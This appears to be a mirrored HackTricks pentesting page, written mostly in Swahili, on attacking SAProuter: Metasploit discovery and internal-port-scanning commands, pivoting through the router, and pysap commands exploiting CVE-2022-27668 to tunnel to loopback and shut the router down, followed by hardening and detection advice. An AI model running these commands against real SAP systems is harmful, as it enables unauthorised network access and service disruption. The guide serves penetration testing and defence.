maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/3299-pentesting-saprouter.md

132 lines
7.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# # 3299/tcp - Pentesting SAProuter
{{#include ../banners/hacktricks-training.md}}
```text
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
```
Hii ni muhtasari wa chapisho kutoka [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
## Kuelewa Kupenya SAProuter kwa Metasploit
SAProuter inafanya kazi kama proxy ya nyuma kwa mifumo ya SAP, hasa kudhibiti ufikiaji kati ya mtandao wa intaneti na mitandao ya ndani ya SAP. Mara nyingi inakabiliwa na intaneti kwa kuruhusu bandari ya TCP 3299 kupitia moto wa shirika. Mpangilio huu unafanya SAProuter kuwa lengo la kuvutia kwa pentesting kwa sababu inaweza kutumikia kama lango la mitandao ya ndani yenye thamani kubwa.
**Kuchanganua na Kukusanya Taarifa**
Kwanza, uchanganuzi unafanywa ili kubaini kama router ya SAP inafanya kazi kwenye IP fulani kwa kutumia moduli ya **sap_service_discovery**. Hatua hii ni muhimu kwa kuanzisha uwepo wa router ya SAP na bandari yake iliyo wazi.
```text
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
msf auxiliary(sap_service_discovery) > run
```
Baada ya kugundua, uchunguzi zaidi wa usanidi wa SAP router unafanywa kwa kutumia moduli ya **sap_router_info_request** ili kuweza kufichua maelezo ya mtandao wa ndani.
```text
msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
msf auxiliary(sap_router_info_request) > run
```
**Kuhesabu Huduma za Ndani**
Kwa kutumia maarifa ya mtandao wa ndani yaliyopatikana, moduli ya **sap_router_portscanner** inatumika kuchunguza mwenyeji wa ndani na huduma kupitia SAProuter, ikiruhusu kuelewa kwa undani mitandao ya ndani na usanidi wa huduma.
```text
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
```
Moduli huu una uwezo wa kubadilika katika kulenga mifano maalum ya SAP na bandari, na hivyo kuwa chombo chenye ufanisi kwa uchunguzi wa kina wa mtandao wa ndani.
**Uhesabu wa Juu na Ramani za ACL**
Kuchunguza zaidi kunaweza kufichua jinsi Orodha za Udhibiti wa Ufikiaji (ACLs) zilivyowekwa kwenye SAProuter, zikielezea ni muunganisho gani unaruhusiwa au kuzuia. Taarifa hii ni muhimu katika kuelewa sera za usalama na uwezekano wa udhaifu.
```text
msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
```
**Blind Enumeration of Internal Hosts**
Katika hali ambapo taarifa za moja kwa moja kutoka kwa SAProuter ni chache, mbinu kama vile blind enumeration zinaweza kutumika. Njia hii inajaribu kukisia na kuthibitisha uwepo wa majina ya ndani ya mwenyeji, ikifunua malengo yanayoweza bila anwani za IP za moja kwa moja.
**Leveraging Information for Penetration Testing**
Baada ya kuchora ramani ya mtandao na kubaini huduma zinazopatikana, wapimaji wa penetration wanaweza kutumia uwezo wa proxy wa Metasploit kuhamasisha kupitia SAProuter kwa ajili ya uchunguzi zaidi na unyakuzi wa huduma za ndani za SAP.
```text
msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
msf auxiliary(sap_hostctrl_getcomputersystem) > run
```
**Hitimisho**
Mbinu hii inaonyesha umuhimu wa usanidi salama wa SAProuter na inasisitiza uwezekano wa kufikia mitandao ya ndani kupitia upimaji wa penetration ulioelekezwa. Kuweka salama SAP routers na kuelewa jukumu lao katika usanifu wa usalama wa mtandao ni muhimu kwa kulinda dhidi ya ufikiaji usioidhinishwa.
Kwa maelezo zaidi kuhusu moduli za Metasploit na matumizi yake, tembelea [Rapid7's database](http://www.rapid7.com/db).
---
## Uthibitisho wa Hivi Karibuni (2022-2025)
### CVE-2022-27668 Udhibiti Mbaya wa Ufikiaji ➜ Utendaji wa Amri ya Utawala wa Kijijini
Mnamo Juni 2022, SAP ilitoa Kumbukumbu ya Usalama **3158375** inayoshughulikia kasoro muhimu (CVSS 9.8) katika SAProuter (kernels zote ≥ 7.22). Mshambuliaji asiye na uthibitisho anaweza kutumia entries za `saprouttab` zenye ruhusa kupita kiasi ili **kutuma pakiti za usimamizi** (mfano *shutdown*, *trace-level*, *connection-kill*) kutoka kwa mwenyeji wa mbali, hata wakati router ilizinduliwa bila chaguo la `-X` remote-admin.
Tatizo hili linatokana na uwezekano wa kujenga tunnel kwa interface ya loopback ya router kwa kulenga anwani isiyoelezwa **0.0.0.0**. Mara tunnel inapoundwa, mshambuliaji anapata haki za mwenyeji wa ndani na anaweza kuendesha amri yoyote ya usimamizi.
Utekelezaji wa vitendo unaweza kurudiwa kwa kutumia mfumo wa **pysap**:
```bash
# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0 -r 3299 \
-a 127.0.0.1 -l 3299 -v
# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299
```
**Tofauti zilizokumbwa**
* SAProuter 7.22 / 7.53 pekee
* Kernel 7.49, 7.77, 7.81, 7.857.88 (ikiwemo KRNL64NUC/UC)
**Suluhisho / Kupunguza**
1. Tumia patch iliyotolewa na SAP Note **3158375**.
2. Ondoa malengo ya wildcard (`*`) kutoka kwenye mistari ya `P` na `S` katika `saprouttab`.
3. Hakikisha router inaanza **bila** chaguo la `-X` na **haifichuliwi** moja kwa moja kwenye Mtandao.
---
## Zana & Hila Zilizosasishwa
* **pysap** inatunzwa kwa ufanisi na inatoa `router_portfw.py`, `router_admin.py` & `router_trace.py` kwa ajili ya kuunda pakiti za NI/Router za kawaida, fuzzing ACLs au kuendesha exploit ya CVE-2022-27668.
* **Nmap** panua ugunduzi wa huduma kwa kuongeza probe ya SAProuter ya kawaida:
```text
Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
```
Patanisha na scripts za NSE au `--script=banner` ili kutambua haraka toleo zinazovuja mfuatano wa banner (`SAProuter <ver> on '<host>'`).
* **Metasploit** moduli za ziada zilizoonyeshwa hapo juu bado zinafanya kazi kupitia SOCKS au NI proxy iliyoundwa na pysap, ikiruhusu ujumuishaji kamili wa mfumo hata wakati router inazuia ufikiaji wa moja kwa moja.
---
## Orodha ya Kuimarisha & Kugundua
* Chuja bandari **3299/TCP** kwenye firewall ya pembejeo ruhusu trafiki tu kutoka kwenye mitandao ya SAP support iliyoaminika.
* Hifadhi SAProuter **imepatishwa kikamilifu**; thibitisha kwa `saprouter -v` na kulinganisha na kiwango cha hivi karibuni cha patch ya kernel.
* Tumia **kiri, maalum kwa mwenyeji** katika `saprouttab`; epuka wildcards `*` na kataa sheria za `P`/`S` zinazolenga wenyeji au bandari zisizo za kawaida.
* Anza huduma na **`-S <secudir>` + SNC** ili kutekeleza usimbaji na uthibitishaji wa pamoja.
* Zima usimamizi wa mbali (`-X`) na, ikiwa inawezekana, fungamanisha msikilizaji na `127.0.0.1` wakati ukitumia proxy ya nyuma ya nje kwa trafiki inayohitajika.
* Fuata logi ya **dev_rout** kwa pakiti za `ROUTER_ADM` zinazoshuku au maombi yasiyotarajiwa ya `NI_ROUTE` kwa `0.0.0.0`.
---
## **Marejeo**
- [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
- [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
## Shodan
- `port:3299 !HTTP Network packet too big`
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink